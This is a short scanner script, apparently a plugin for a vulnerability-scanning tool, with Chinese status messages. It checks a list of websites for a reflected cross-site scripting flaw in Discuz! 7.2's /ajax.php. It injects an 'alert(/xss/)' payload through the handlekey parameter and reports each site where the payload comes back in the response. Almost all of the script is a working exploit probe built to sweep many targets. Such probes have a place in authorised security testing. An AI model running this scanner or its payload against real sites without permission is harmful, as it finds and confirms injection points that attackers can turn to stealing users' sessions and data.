#request urls = array


function main(args)
{
	printclolor("当前正在检测:"."Discuz! 7.2 /ajax.php 跨站脚本漏洞",1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			res = HttpGet(url."/ajax.php?infloat=yes&handlekey=123);alert(/xss/);//'","User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],"if(typeof messagehandle_123);alert(/xss/);",0)!= "-1")
			{
				printclolor("[+]".urls[i]."/ajax.php?infloat=yes&handlekey=123);alert(/xss/);//  |目标存在Discuz! 7.2 /ajax.php 跨站脚本漏洞",3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
}
